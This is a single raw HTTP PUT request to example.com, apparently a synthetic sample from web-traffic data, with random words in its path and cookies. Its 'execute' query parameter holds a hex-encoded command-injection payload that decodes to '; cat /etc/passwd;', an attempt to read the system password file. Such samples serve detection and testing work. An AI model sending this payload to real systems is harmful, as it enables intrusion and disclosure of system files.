PUT /symmetric/angle%20brackets/greater%20than?execute=3b20636174202f6574632f7061737377643b HTTP/1.1
Host: example.com
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:37.0) Gecko/20100101 Firefox/37.0
Cookie: semicolon=scenario; throughput=pop; recursion=symmetric; SESSIONID=409320b90b230173f810aa692a48c612fcea538ce08b07138eab46397ab8aebc8a252ad34aee09fb64e02da7e3e41c6f

